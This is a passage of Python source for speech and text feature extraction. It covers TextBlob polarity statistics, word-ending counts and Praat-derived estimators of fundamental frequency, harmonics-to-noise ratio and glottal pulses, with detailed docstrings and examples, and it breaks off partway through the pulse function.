return [float(avgpolarity), float(stdpolarity), float(varpolarity)]
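# Illustrative interpretation (TextBlob polarity is heuristic): the returned
# list is the [mean, std, variance] of polarity over successive 3-word windows,
# so a transcript mixing praise and complaints shows a larger window-to-window
# std than a uniformly neutral one.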
```
#### File: text_features/words/word_endings.py
```python
from nltk import word_tokenize
import re
def word_endings(importtext,ending):
text=word_tokenize(importtext)
#number of words ending in 'ed'
words=[w for w in text if re.search(ending+'$', w)]
return [len(words),words]
#test
#print(word_endings('In a blunt warning to the remaining ISIS fighters, Army Command Sgt. Maj. <NAME> said the shrinking band of militants could either surrender to the U.S. military or face death. “ISIS needs to understand that the Joint Force is on orders to annihilate them,” he wrote in a forceful message on Facebook. “So they have two options, should they decide to come up against the United States, our allies and partners: surrender or die!”','s'))
```
#### File: sa/features/signal.py
```python
import numpy as np
import peakutils as pu
def get_F_0( signal, rate, time_step = 0.0, min_pitch = 75, max_pitch = 600,
max_num_cands = 15, silence_thres = .03, voicing_thres = .45,
octave_cost = .01, octave_jump_cost = .35,
voiced_unvoiced_cost = .14, accurate = False, pulse = False ):
"""
Computes median Fundamental Frequency ( :math:`F_0` ).
The fundamental frequency ( :math:`F_0` ) of a signal is the lowest
frequency, or the longest wavelength of a periodic waveform. In the context
of this algorithm, :math:`F_0` is calculated by segmenting a signal into
frames, then for each frame the most likely candidate is chosen from the
lowest possible frequencies to be :math:`F_0`. From all of these values,
the median value is returned. More specifically, the algorithm filters out
frequencies higher than the Nyquist Frequency from the signal, then
segments the signal into frames of at least 3 periods of the minimum
pitch. For each frame, it then calculates the normalized autocorrelation
( :math:`r_a` ), or the correlation of the signal to a delayed copy of
itself. :math:`r_a` is calculated according to Boersma's paper
( referenced below ), which is an improvement of previous methods.
:math:`r_a` is estimated by dividing the autocorrelation of the windowed
signal by the autocorrelation of the window. After :math:`r_a` is
calculated the maxima values of :math:`r_a` are found. These points
correspond to the lag domain, or points in the delayed signal, where the
correlation value has peaked. The higher peaks indicate a stronger
correlation. These points in the lag domain suggest places of wave
repetition and are the candidates for :math:`F_0`. The best candidate for
:math:`F_0` of each frame is picked by a cost function, a function that
compares the cost of transitioning from the best :math:`F_0` of the
previous frame to all possible :math:`F_0's` of the current frame. Once the
path of :math:`F_0's` of least cost has been determined, the median
:math:`F_0` of all voiced frames is returned.
This algorithm is adapted from:
http://www.fon.hum.uva.nl/david/ba_shs/2010/Boersma_Proceedings_1993.pdf
and from:
https://github.com/praat/praat/blob/master/fon/Sound_to_Pitch.cpp
.. note::
It has been shown that depressed and suicidal men speak with a reduced
fundamental frequency range, ( described in:
http://ameriquests.org/index.php/vurj/article/download/2783/1181 ) and
patients responding well to depression treatment show an increase in
their fundamental frequency variability ( described in :
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3022333/ ). Because
acoustical properties of speech are the earliest and most consistent
indicators of mood disorders, early detection of fundamental frequency
changes could significantly improve recovery time for disorders with
psychomotor symptoms.
Args:
signal ( numpy.ndarray ): This is the signal :math:`F_0` will be calculated from.
rate ( int ): This is the number of samples taken per second.
time_step ( float ): ( optional, default value: 0.0 ) The measurement, in seconds, of time passing between each frame. The smaller the time_step, the more overlap that will occur. If 0 is supplied the degree of oversampling will be equal to four.
min_pitch ( float ): ( optional, default value: 75 ) This is the minimum value to be returned as pitch, which cannot be less than or equal to zero.
max_pitch ( float ): ( optional, default value: 600 ) This is the maximum value to be returned as pitch, which cannot be greater than the Nyquist Frequency.
max_num_cands ( int ): ( optional, default value: 15 ) This is the maximum number of candidates to be considered for each frame, the unvoiced candidate ( i.e. :math:`F_0` equal to zero ) is always considered.
silence_thres ( float ): ( optional, default value: 0.03 ) Frames that do not contain amplitudes above this threshold ( relative to the global maximum amplitude ), are probably silent.
voicing_thres ( float ): ( optional, default value: 0.45 ) This is the strength of the unvoiced candidate, relative to the maximum possible :math:`r_a`. To increase the number of unvoiced decisions, increase this value.
octave_cost ( float ): ( optional, default value: 0.01 per octave ) This is the degree of favouring of high-frequency candidates, relative to the maximum possible :math:`r_a`. This is necessary because in the case of a perfectly periodic signal, all undertones of :math:`F_0` are equally strong candidates as :math:`F_0` itself. To more strongly favour recruitment of high-frequency candidates, increase this value.
        octave_jump_cost ( float ): ( optional, default value: 0.35 ) This is the degree of disfavouring of pitch changes, relative to the maximum possible :math:`r_a`. To decrease the number of large frequency jumps, increase this value.
voiced_unvoiced_cost ( float ): ( optional, default value: 0.14 ) This is the degree of disfavouring of voiced/unvoiced transitions, relative to the maximum possible :math:`r_a`. To decrease the number of voiced/unvoiced transitions, increase this value.
accurate ( bool ): ( optional, default value: False ) If False, the window is a Hanning window with a length of :math:`\\frac{ 3.0} {min\_pitch}`. If True, the window is a Gaussian window with a length of :math:`\\frac{6.0}{min\_pitch}`, i.e. twice the length.
pulse ( bool ): ( optional, default value: False ) If False, the function returns a list containing only the median :math:`F_0`. If True, the function returns a list with all values necessary to calculate pulses. This list contains the median :math:`F_0`, the frequencies for each frame in a list, a list of tuples containing the beginning time of the frame, and the ending time of the frame, and the signal filtered by the Nyquist Frequency. The indicies in the second and third list correspond to each other.
Returns:
list: Index 0 contains the median :math:`F_0` in hz. If pulse is set
equal to True, indicies 1, 2, and 3 will contain: a list of all voiced
periods in order, a list of tuples of the beginning and ending time
of a voiced interval, with each index in the list corresponding to the
previous list, and a numpy.ndarray of the signal filtered by the
Nyquist Frequency. If pulse is set equal to False, or left to the
default value, then the list will only contain the median :math:`F_0`.
Raises:
ValueError: min_pitch has to be greater than zero.
ValueError: octave_cost isn't in [ 0, 1 ].
ValueError: silence_thres isn't in [ 0, 1 ].
ValueError: voicing_thres isn't in [ 0, 1 ].
ValueError: max_pitch can't be larger than Nyquist Frequency.
Example:
The example below demonstrates what different outputs this function
gives, using a synthesized signal.
>>> import numpy as np
>>> from matplotlib import pyplot as plt
>>> domain = np.linspace( 0, 6, 300000 )
>>> rate = 50000
>>> y = lambda x: np.sin( 2 * np.pi * 140 * x )
>>> signal = y( domain )
>>> get_F_0( signal, rate )
[ 139.70588235294116 ]
        >>> get_F_0( signal, rate, voicing_thres = .99, accurate = True )
[ 139.70588235294116 ]
>>> w, x, y, z = get_F_0( signal, rate, pulse = True )
>>> print( w )
139.70588235294116
>>> print( x[ :5 ] )
[ 0.00715789 0.00715789 0.00715789 0.00715789 0.00715789 ]
>>> print( y[ :5 ] )
[ ( 0.002500008333361111, 0.037500125000416669 ),
( 0.012500041666805555, 0.047500158333861113 ),
( 0.022500075000249999, 0.057500191667305557 ),
( 0.032500108333694447, 0.067500225000749994 ),
( 0.042500141667138891, 0.077500258334194452 ) ]
>>> print( z[ : 5 ] )
[ 0. 0.01759207 0.0351787 0.05275443 0.07031384 ]
        The example below demonstrates the algorithm's ability to adjust for
signals with dynamic frequencies, by comparing a plot of a synthesized
signal with an increasing frequency, and the calculated frequencies for
that signal.
>>> domain = np.linspace( 1, 2, 10000 )
>>> rate = 10000
>>> y = lambda x : np.sin( x ** 8 )
>>> signal = y( domain )
>>> median_F_0, periods, time_vals, modified_sig = get_F_0( signal,
rate, pulse = True )
>>> plt.subplot( 211 )
>>> plt.plot( domain, signal )
>>> plt.title( "Synthesized Signal" )
>>> plt.ylabel( "Amplitude" )
>>> plt.subplot( 212 )
>>> plt.plot( np.linspace( 1, 2, len( periods ) ), 1.0 / np.array(
periods ) )
>>> plt.title( "Frequencies of Signal" )
>>> plt.xlabel( "Samples" )
>>> plt.ylabel( "Frequency" )
        >>> plt.suptitle( "Comparison of Synthesized Signal and its Calculated Frequencies" )
>>> plt.show()
.. figure:: figures/F_0_synthesized_sig.png
:align: center
"""
if min_pitch <= 0:
raise ValueError( "min_pitch has to be greater than zero." )
if max_num_cands < max_pitch / min_pitch:
max_num_cands = int( max_pitch / min_pitch )
initial_len = len( signal )
total_time = initial_len / float( rate )
tot_time_arr = np.linspace( 0, total_time, initial_len )
max_place_poss = 1.0 / min_pitch
min_place_poss = 1.0 / max_pitch
#to silence formants
min_place_poss2 = 0.5 / max_pitch
if accurate: pds_per_window = 6.0
else: pds_per_window = 3.0
#degree of oversampling is 4
if time_step <= 0: time_step = ( pds_per_window / 4.0 ) / min_pitch
w_len = pds_per_window / min_pitch
#correcting for time_step
octave_jump_cost *= .01 / time_step
voiced_unvoiced_cost *= .01 / time_step
Nyquist_Frequency = rate / 2.0
upper_bound = .95 * Nyquist_Frequency
zeros_pad = 2 ** ( int( np.log2( initial_len ) ) + 1 ) - initial_len
signal = np.hstack( ( signal, np.zeros( zeros_pad ) ) )
fft_signal = np.fft.fft( signal )
fft_signal[ int( upper_bound ) : -int( upper_bound ) ] = 0
sig = np.fft.ifft( fft_signal )
sig = sig[ :initial_len ].real
#checking to make sure values are valid
if Nyquist_Frequency < max_pitch:
raise ValueError( "max_pitch can't be larger than Nyquist Frequency." )
if octave_cost < 0 or octave_cost > 1:
raise ValueError( "octave_cost isn't in [ 0, 1 ]" )
if voicing_thres< 0 or voicing_thres > 1:
raise ValueError( "voicing_thres isn't in [ 0, 1 ]" )
if silence_thres < 0 or silence_thres > 1:
raise ValueError( "silence_thres isn't in [ 0, 1 ]" )
#finding number of samples per frame and time_step
frame_len = int( w_len * rate + .5 )
time_len = int( time_step * rate + .5 )
#initializing list of candidates for F_0, and their strengths
best_cands, strengths, time_vals = [], [], []
#finding the global peak the way Praat does
global_peak = max( abs( sig - sig.mean() ) )
e = np.e
inf = np.inf
log = np.log2
start_i = 0
while start_i < len( sig ) - frame_len :
end_i = start_i + frame_len
segment = sig[ start_i : end_i ]
if accurate:
t = np.linspace( 0, w_len, len( segment ) )
numerator = e ** ( -12.0 * ( t / w_len - .5 ) ** 2.0 ) - e ** -12.0
denominator = 1.0 - e ** -12.0
window = numerator / denominator
interpolation_depth = 0.25
else:
window = np.hanning( len( segment ) )
interpolation_depth = 0.50
#shave off ends of time intervals to account for overlapping
start_time = tot_time_arr[ start_i + int( time_len / 4.0 ) ]
stop_time = tot_time_arr[ end_i - int( time_len / 4.0 ) ]
time_vals.append( ( start_time, stop_time ) )
start_i += time_len
long_pd_i = int( rate / min_pitch )
half_pd_i = int( long_pd_i / 2.0 + 1 )
long_pd_cushion = segment[ half_pd_i : - half_pd_i ]
#finding local peak and local mean the way Praat does
#local mean is found by looking a longest period to either side of the
#center of the frame, and using only the values within this interval to
#calculate the local mean, and similarly local peak is found by looking
#a half of the longest period to either side of the center of the
#frame, ( after the frame has windowed ) and choosing the absolute
#maximum in this interval
local_mean = long_pd_cushion.mean()
segment = segment - local_mean
segment *= window
half_pd_cushion = segment[ long_pd_i : -long_pd_i ]
local_peak = max( abs( half_pd_cushion ) )
if local_peak == 0:
#shortcut -> complete silence and only candidate is silent candidate
best_cands.append( [ inf ] )
strengths.append( [ voicing_thres + 2 ] )
else:
#calculating autocorrelation, based off steps 3.2-3.10
intensity = local_peak / float( global_peak )
N = len( segment )
nFFT = 2 ** int( log( ( 1.0 + interpolation_depth ) * N ) + 1 )
window = np.hstack( ( window, np.zeros( nFFT - N ) ) )
segment = np.hstack( ( segment, np.zeros( nFFT - N ) ) )
x_fft = np.fft.fft( segment )
r_a = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_a = r_a[ : int( N / pds_per_window ) ]
x_fft = np.fft.fft( window )
r_w = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_w = r_w[ : int( N / pds_per_window ) ]
r_x = r_a / r_w
r_x /= r_x[ 0 ]
#creating an array of the points in time corresponding to sampled
#autocorrelation of the signal ( r_x )
time_array = np.linspace( 0 , w_len / pds_per_window, len( r_x ) )
peaks = pu.indexes( r_x , thres = 0 )
max_values, max_places = r_x[ peaks ], time_array[ peaks ]
#only consider places that are voiced over a certain threshold
max_places = max_places[ max_values > 0.5 * voicing_thres ]
max_values = max_values[ max_values > 0.5 * voicing_thres ]
for i in range( len( max_values ) ):
#reflecting values > 1 through 1.
if max_values[ i ] > 1.0 :
max_values[ i ] = 1.0 / max_values[ i ]
#calculating the relative strength value
rel_val = [ val - octave_cost * log( place * min_pitch ) for
val, place in zip( max_values, max_places ) ]
if len( max_values ) > 0.0 :
#finding the max_num_cands-1 maximizers, and maximums, then
#calculating their strengths ( eq. 23 and 24 ) and accounting for
#silent candidate
max_places = [ max_places[ i ] for i in np.argsort( rel_val )[
-max_num_cands + 1 : ] ]
max_values = [ max_values[ i ] for i in np.argsort( rel_val )[
-max_num_cands + 1 : ] ]
max_places = np.array( max_places )
max_values = np.array( max_values )
rel_val = list(np.sort( rel_val )[ -max_num_cands + 1 : ] )
#adding the silent candidate's strength to strengths
rel_val.append( voicing_thres + max( 0, 2 - ( intensity /
( silence_thres / ( 1 + voicing_thres ) ) ) ) )
#inf is our silent candidate
max_places = np.hstack( ( max_places, inf ) )
best_cands.append( list( max_places ) )
strengths.append( rel_val )
else:
#if there are no available maximums, only account for silent
#candidate
best_cands.append( [ inf ] )
strengths.append( [ voicing_thres + max( 0, 2 - intensity /
( silence_thres / ( 1 + voicing_thres ) ) ) ] )
#Calculates smallest costing path through list of candidates ( forwards ),
#and returns path.
best_total_cost, best_total_path = -inf, []
#for each initial candidate find the path of least cost, then of those
#paths, choose the one with the least cost.
for cand in range( len( best_cands[ 0 ] ) ):
start_val = best_cands[ 0 ][ cand ]
total_path = [ start_val ]
level = 1
prev_delta = strengths[ 0 ][ cand ]
maximum = -inf
while level < len( best_cands ) :
prev_val = total_path[ -1 ]
best_val = inf
for j in range( len( best_cands[ level ] ) ):
cur_val = best_cands[ level ][ j ]
cur_delta = strengths[ level ][ j ]
cost = 0
cur_unvoiced = cur_val == inf or cur_val < min_place_poss2
prev_unvoiced = prev_val == inf or prev_val < min_place_poss2
if cur_unvoiced:
#both voiceless
if prev_unvoiced:
cost = 0
#voiced-to-unvoiced transition
else:
cost = voiced_unvoiced_cost
else:
#unvoiced-to-voiced transition
if prev_unvoiced:
cost = voiced_unvoiced_cost
#both are voiced
else:
cost = octave_jump_cost * abs( log( cur_val /
prev_val ) )
#The cost for any given candidate is given by the transition
#cost, minus the strength of the given candidate
value = prev_delta - cost + cur_delta
if value > maximum: maximum, best_val = value, cur_val
prev_delta = maximum
total_path.append( best_val )
level += 1
if maximum > best_total_cost:
best_total_cost, best_total_path = maximum, total_path
f_0_forth = np.array( best_total_path )
#Calculates smallest costing path through list of candidates ( backwards ),
#and returns path. Going through the path backwards introduces frequencies
#previously marked as unvoiced, or increases undertones, to decrease
#frequency jumps
best_total_cost, best_total_path2 = -inf, []
#Starting at the end, for each initial candidate find the path of least
#cost, then of those paths, choose the one with the least cost.
for cand in range( len( best_cands[ -1 ] ) ):
start_val = best_cands[ -1 ][ cand ]
total_path = [ start_val ]
level = len( best_cands ) - 2
prev_delta = strengths[ -1 ][ cand ]
maximum = -inf
while level > -1 :
prev_val = total_path[ -1 ]
best_val = inf
for j in range( len( best_cands[ level ] ) ):
cur_val = best_cands[ level ][ j ]
cur_delta = strengths[ level ][ j ]
cost = 0
cur_unvoiced = cur_val == inf or cur_val < min_place_poss2
prev_unvoiced = prev_val == inf or prev_val < min_place_poss2
if cur_unvoiced:
#both voiceless
if prev_unvoiced:
cost = 0
#voiced-to-unvoiced transition
else:
cost = voiced_unvoiced_cost
else:
#unvoiced-to-voiced transition
if prev_unvoiced:
cost = voiced_unvoiced_cost
#both are voiced
else:
cost = octave_jump_cost * abs( log( cur_val /
prev_val ) )
#The cost for any given candidate is given by the transition
#cost, minus the strength of the given candidate
value = prev_delta - cost + cur_delta
if value > maximum: maximum, best_val = value, cur_val
prev_delta = maximum
total_path.append( best_val )
level -= 1
if maximum > best_total_cost:
best_total_cost, best_total_path2 = maximum, total_path
f_0_back = np.array( best_total_path2 )
#reversing f_0_backward so the initial value corresponds to first frequency
f_0_back = f_0_back[ -1 : : -1 ]
#choose the maximum frequency from each path for the total path
f_0 = np.array( [ min( i, j ) for i, j in zip( f_0_forth, f_0_back ) ] )
if pulse:
#removing all unvoiced time intervals from list
removed = 0
for i in range( len( f_0 ) ):
if f_0[ i ] > max_place_poss or f_0[ i] < min_place_poss:
time_vals.remove( time_vals[ i - removed ] )
removed += 1
for i in range( len( f_0 ) ):
        #if f_0 is voiceless assign occurrence of peak to inf -> when divided
        #by one this will give us a frequency of 0, corresponding to an unvoiced
        #frame
if f_0[ i ] > max_place_poss or f_0[ i ] < min_place_poss :
f_0[ i ] = inf
f_0 = f_0[ f_0 < inf ]
if pulse:
return [ np.median( 1.0 / f_0 ), list( f_0 ), time_vals, signal ]
if len( f_0 ) == 0:
return [ 0 ]
else:
return [ np.median( 1.0 / f_0 ) ]
def get_HNR( signal, rate, time_step = 0, min_pitch = 75,
silence_threshold = .1, periods_per_window = 4.5 ):
"""
Computes mean Harmonics-to-Noise ratio ( HNR ).
The Harmonics-to-Noise ratio ( HNR ) is the ratio
of the energy of a periodic signal, to the energy of the noise in the
signal, expressed in dB. This value is often used as a measure of
hoarseness in a person's voice. By way of illustration, if 99% of the
energy of the signal is in the periodic part and 1% of the energy is in
noise, then the HNR is :math:`10 \cdot log_{10}( \\frac{99}{1} ) = 20`.
A HNR of 0 dB means there is equal energy in harmonics and in noise. The
first step for HNR determination of a signal, in the context of this
algorithm, is to set the maximum frequency allowable to the signal's
Nyquist Frequency. Then the signal is segmented into frames of length
:math:`\\frac{periods\_per\_window}{min\_pitch}`. Then for each frame, it
calculates the normalized autocorrelation ( :math:`r_a` ), or the
correlation of the signal to a delayed copy of itself. :math:`r_a` is
calculated according to Boersma's paper ( referenced below ). The highest
peak is picked from :math:`r_a`. If the height of this peak is larger than
the strength of the silent candidate, then the HNR for this frame is
calculated from that peak. The height of the peak corresponds to the energy
of the periodic part of the signal. Once the HNR value has been calculated
for all voiced frames, the mean is taken from these values and returned.
This algorithm is adapted from:
http://www.fon.hum.uva.nl/david/ba_shs/2010/Boersma_Proceedings_1993.pdf
and from:
https://github.com/praat/praat/blob/master/fon/Sound_to_Harmonicity.cpp
.. note::
The Harmonics-to-Noise ratio of a person's voice is strongly negatively
correlated to depression severity ( described in:
https://ll.mit.edu/mission/cybersec/publications/publication-files/full_papers/2012_09_09_MalyskaN_Interspeech_FP.pdf )
and can be used as an early indicator of depression, and suicide risk.
After this indicator has been realized, preventative medicine can be
implemented, improving recovery time or even preventing further
symptoms.
Args:
signal ( numpy.ndarray ): This is the signal the HNR will be calculated from.
rate ( int ): This is the number of samples taken per second.
time_step ( float ): ( optional, default value: 0.0 ) This is the measurement, in seconds, of time passing between each frame. The smaller the time_step, the more overlap that will occur. If 0 is supplied, the degree of oversampling will be equal to four.
min_pitch ( float ): ( optional, default value: 75 ) This is the minimum value to be returned as pitch, which cannot be less than or equal to zero
silence_threshold ( float ): ( optional, default value: 0.1 ) Frames that do not contain amplitudes above this threshold ( relative to the global maximum amplitude ), are considered silent.
periods_per_window ( float ): ( optional, default value: 4.5 ) 4.5 is best for speech. The more periods contained per frame, the more the algorithm becomes sensitive to dynamic changes in the signal.
Returns:
float: The mean HNR of the signal expressed in dB.
Raises:
ValueError: min_pitch has to be greater than zero.
ValueError: silence_threshold isn't in [ 0, 1 ].
Example:
The example below adjusts parameters of the function, using the same
synthesized signal with added noise, to demonstrate the stability of
the function.
>>> import numpy as np
>>> from matplotlib import pyplot as plt
>>> domain = np.linspace( 0, 6, 300000 )
>>> rate = 50000
>>> y = lambda x:( 1 + .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain ) + .2 * np.random.random( 300000 )
>>> get_HNR( signal, rate )
21.885338007330802
>>> get_HNR( signal, rate, periods_per_window = 6 )
21.866307805597849
>>> get_HNR( signal, rate, time_step = .04, periods_per_window = 6 )
21.878451649148804
We'd expect an increase in noise to reduce HNR and similar energies
in noise and harmonics to produce a HNR that approaches zero. This is
demonstrated below.
>>> signals = [ y( domain ) + i / 10.0 * np.random.random( 300000 ) for
i in range( 1, 11 ) ]
>>> HNRx10 = [ get_HNR( sig, rate ) for sig in signals ]
>>> plt.plot( np.linspace( .1, 1, 10 ), HNRx10 )
>>> plt.xlabel( "Amount of Added Noise" )
>>> plt.ylabel( "HNR" )
>>> plt.title( "HNR Values of Signals with Added Noise" )
>>> plt.show()
.. figure:: figures/HNR_values_added_noise.png
:align: center
"""
#checking to make sure values are valid
if min_pitch <= 0:
raise ValueError( "min_pitch has to be greater than zero." )
if silence_threshold < 0 or silence_threshold > 1:
raise ValueError( "silence_threshold isn't in [ 0, 1 ]." )
#degree of overlap is four
if time_step <= 0: time_step = ( periods_per_window / 4.0 ) / min_pitch
Nyquist_Frequency = rate / 2.0
max_pitch = Nyquist_Frequency
global_peak = max( abs( signal - signal.mean() ) )
window_len = periods_per_window / float( min_pitch )
#finding number of samples per frame and time_step
frame_len = int( window_len * rate )
t_len = int( time_step * rate )
#segmenting signal, there has to be at least one frame
num_frames = max( 1, int( len( signal ) / t_len + .5 ) )
seg_signal = [ signal[ int( i * t_len ) : int( i * t_len ) + frame_len ]
for i in range( num_frames + 1 ) ]
#initializing list of candidates for HNR
best_cands = []
for index in range( len( seg_signal ) ):
segment = seg_signal[ index ]
#ignoring any potential empty segment
if len( segment) > 0:
window_len = len( segment ) / float( rate )
#calculating autocorrelation, based off steps 3.2-3.10
segment = segment - segment.mean()
local_peak = max( abs( segment ) )
if local_peak == 0 :
best_cands.append( .5 )
else:
intensity = local_peak / global_peak
window = np.hanning( len( segment ) )
segment *= window
N = len( segment )
nsampFFT = 2 ** int( np.log2( N ) + 1 )
window = np.hstack( ( window, np.zeros( nsampFFT - N ) ) )
segment = np.hstack( ( segment, np.zeros( nsampFFT - N ) ) )
x_fft = np.fft.fft( segment )
r_a = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_a = r_a[ : N ]
r_a = np.nan_to_num( r_a )
x_fft = np.fft.fft( window )
r_w = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_w = r_w[ : N ]
r_w = np.nan_to_num( r_w )
r_x = r_a / r_w
r_x /= r_x[ 0 ]
#creating an array of the points in time corresponding to the
#sampled autocorrelation of the signal ( r_x )
time_array = np.linspace( 0, window_len, len( r_x ) )
i = pu.indexes( r_x )
max_values, max_places = r_x[ i ], time_array[ i ]
max_place_poss = 1.0 / min_pitch
min_place_poss = 1.0 / max_pitch
max_values = max_values[ max_places >= min_place_poss ]
max_places = max_places[ max_places >= min_place_poss ]
max_values = max_values[ max_places <= max_place_poss ]
max_places = max_places[ max_places <= max_place_poss ]
for i in range( len( max_values ) ):
#reflecting values > 1 through 1.
if max_values[ i ] > 1.0 :
max_values[ i ] = 1.0 / max_values[ i ]
#eq. 23 and 24 with octave_cost, and voicing_threshold set to zero
if len( max_values ) > 0:
strengths = [ max( max_values ), max( 0, 2 - ( intensity /
( silence_threshold ) ) ) ]
#if the maximum strength is the unvoiced candidate, then .5
#corresponds to HNR of 0
if np.argmax( strengths ):
best_cands.append( 0.5 )
else:
best_cands.append( strengths[ 0 ] )
else:
best_cands.append( 0.5 )
best_cands = np.array( best_cands )
best_cands = best_cands[ best_cands > 0.5 ]
if len(best_cands) == 0:
return 0
#eq. 4
best_cands = 10.0 * np.log10( best_cands / ( 1.0 - best_cands ) )
best_candidate = np.mean( best_cands )
return best_candidate
def get_Pulses( signal, rate, min_pitch = 75, max_pitch = 600,
include_max = False, include_min = True ):
"""
Computes glottal pulses of a signal.
This algorithm relies on the voiced/unvoiced decisions and fundamental
frequencies, calculated for each voiced frame by get_F_0. For every voiced
interval, a list of points is created by finding the initial point
:math:`t_1`, which is the absolute extremum ( or the maximum/minimum,
depending on your include_max and include_min parameters ) of the amplitude
of the sound in the interval
:math:`[\ t_{mid} - \\frac{T_0}{2},\ t_{mid} + \\frac{T_0}{2}\ ]`, where
:math:`t_{mid}` is the midpoint of the interval, and :math:`T_0` is the
period at :math:`t_{mid}`, as can be linearly interpolated from the periods
acquired from get_F_0. From this point, the algorithm searches for points
:math:`t_i` to the left until we reach the left edge of the interval. These
points are the absolute extrema ( or the maxima/minima ) in the interval
:math:`[\ t_{i-1} - 1.25 \cdot T_{i-1},\ t_{i-1} - 0.8 \cdot T_{i-1}\ ]`,
with :math:`t_{i-1}` being the last found point, and :math:`T_{i-1}` the
period at this point. The same is done to the right of :math:`t_1`. The
points are returned in consecutive order.
This algorithm is adapted from:
https://pdfs.semanticscholar.org/16d5/980ba1cf168d5782379692517250e80f0082.pdf
and from:
https://github.com/praat/praat/blob/master/fon/Sound_to_PointProcess.cpp
.. note::
This algorithm is a helper function for the jitter algorithm, that
returns a list of points in the time domain corresponding to minima or
maxima of the signal. These minima or maxima are the sequence of
glottal closures in vocal-fold vibration. The distance between
consecutive pulses is defined as the wavelength of the signal at this
interval, which can be used to later calculate jitter.
Args:
signal ( numpy.ndarray ): This is the signal the glottal pulses will be calculated from.
rate ( int ): This is the number of samples taken per second.
min_pitch ( float ): ( optional, default value: 75 ) This is the minimum value to be returned as pitch, which cannot be less than or equal to zero
max_pitch ( float ): ( optional, default value: 600 ) This is the maximum value to be returned as pitch, which cannot be greater than Nyquist Frequency
include_max ( bool ): ( optional, default value: False ) This determines if maxima values will be used when calculating pulses
include_min ( bool ): ( optional, default value: True ) This determines if minima values will be used when calculating pulses
Returns:
numpy.ndarray: This is an array of points in a time series that
correspond to the signal's periodicity.
Raises:
ValueError: include_min and include_max can't both be False
Example:
Pulses are calculated for a synthesized signal, and the variation in
time between each pulse is shown.
>>> import numpy as np
>>> from matplotlib import pyplot as plt
>>> domain = np.linspace( 0, 6, 300000 )
>>> y = lambda x:( 1 + .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain ) + .2 * np.random.random( 300000 )
>>> rate = 50000
>>> p = get_Pulses( signal, rate )
>>> print( p[ :5 ] )
[ 0.00542001 0.01236002 0.01946004 0.02702005 0.03402006 ]
>>> print( np.diff( p[ :6 ] ) )
[ 0.00694001 0.00710001 0.00756001 0.00700001 0.00712001 ]
>>> p = get_Pulses( signal, rate, include_max = True )
>>> print( p[ :5 ] )
[ 0.00886002 0.01608003 0.02340004 0.03038006 0.03732007 ]
>>> print( np.diff( p[ :6 ] ) )
[ 0.00722001 0.00732001 0.00698001 0.00694001 0.00734001 ]
A synthesized signal, with an increasing frequency, and the calculated
pulses of that signal are plotted together to demonstrate the
        algorithm's ability to adapt to dynamic pulses.
>>> domain = np.linspace( 1.85, 2.05, 10000 )
>>> rate = 50000
>>> y = lambda x : np.sin( x ** 8 )
>>> signal = np.hstack( ( np.zeros( 2500 ), y( domain[ 2500: -2500 ] ),
np.zeros( 2500 ) ) )
>>> pulses = get_Pulses( signal, rate )
>>> plt.plot( domain, signal, 'r', alpha = .5, label = "Signal" )
>>> plt.plot( ( 1.85 + pulses[ 0 ] ) * np.ones ( 5 ),
np.linspace( -1, 1, 5 ), 'b', alpha = .5, label = "Pulses" )
>>> plt.legend()
>>> for pulse in pulses[ 1: ]:
>>> plt.plot( ( 1.85 + pulse ) * np.ones ( 5 ),
np.linspace( -1, 1, 5 ), 'b', alpha = .5 )
>>> plt.xlabel( "Samples" )
>>> plt.ylabel( "Amplitude" )
>>> plt.title( "Signal with Pulses, Calculated from Minima of Signal" )
>>> plt.show()
.. figure:: figures/Pulses_sig.png
:align: center
"""
#first calculate F_0 estimates for each voiced interval
add = np.hstack
if not include_max and not include_min:
raise ValueError( "include_min and include_max can't both be False" )
median, period, intervals, signal = get_F_0( signal, rate,
min_pitch = min_pitch,
max_pitch = max_pitch,
pulse = True )
global_peak = max( abs( signal - signal.mean() ) )
#points will be a list of points where pulses occur, voiced_intervals will
#be a list of tuples consisting of voiced intervals with overlap
#eliminated
points, voiced_intervals = [], []
#f_times will be an array of times corresponding to our given frequencies,
#to be used for interpolating, v_time be an array consisting of all the
#points in time that are voiced
f_times, v_time = np.array( [] ), np.array( [] )
total_time = np.linspace( 0, len( signal ) / float( rate ), len( signal ) )
for interval in intervals:
start, stop = interval
#finding all midpoints for each interval
f_times = add( ( f_times, ( start + stop ) / 2.0 ) )
i = 0
while i < len( intervals ) - 1 :
start, stop = intervals[ i ]
i_start, prev_stop = intervals[ i ]
#while there is overlap, look to the next interval
while start <= prev_stop and i < len( intervals ) - 1 :
prev_start, prev_stop = intervals[ i ]
i += 1
start, stop = intervals[ i ]
if i == len( intervals ) - 1:
samp = int ( ( stop - i_start ) * rate )
v_time = add( ( v_time, np.linspace( i_start, stop, samp ) ) )
voiced_intervals.append( ( i_start, stop ) )
else:
samp = int ( ( prev_stop - i_start ) * rate )
v_time = add( ( v_time, np.linspace( i_start, prev_stop, samp ) ) )
voiced_intervals.append( ( i_start, prev_stop ) )
#interpolate the periods so that each voiced point has a corresponding
#period attached to it
periods_interp = np.interp( v_time, f_times, period )
for interval in voiced_intervals:
start, stop = interval
midpoint = ( start + stop ) / 2.0
#out of all the voiced points, look for index of the one that is
#closest to our calculated midpoint
midpoint_index = np.argmin( abs( v_time - midpoint ) )
midpoint = v_time[ midpoint_index ]
T_0 = periods_interp[ midpoint_index ]
frame_start = midpoint - T_0
frame_stop = midpoint + T_0
#finding points, start by looking to the left of the center of the
#voiced interval
while frame_start > start :
#out of all given time points in signal, find index of closest to
#start and stop
frame_start_index = np.argmin( abs( total_time - frame_start ) )
frame_stop_index = np.argmin( abs( total_time - frame_stop ) )
frame = signal[ frame_start_index : frame_stop_index ]
if include_max and include_min:
p_index = np.argmax( abs( frame ) ) + frame_start_index
elif include_max:
p_index = np.argmax( frame ) + frame_start_index
else:
p_index = np.argmin( frame ) + frame_start_index
if abs( signal[ p_index ] ) > .02333 * global_peak:
points.append( total_time[ p_index ] )
t = total_time[ p_index ]
t_index = np.argmin( abs( v_time - t ) )
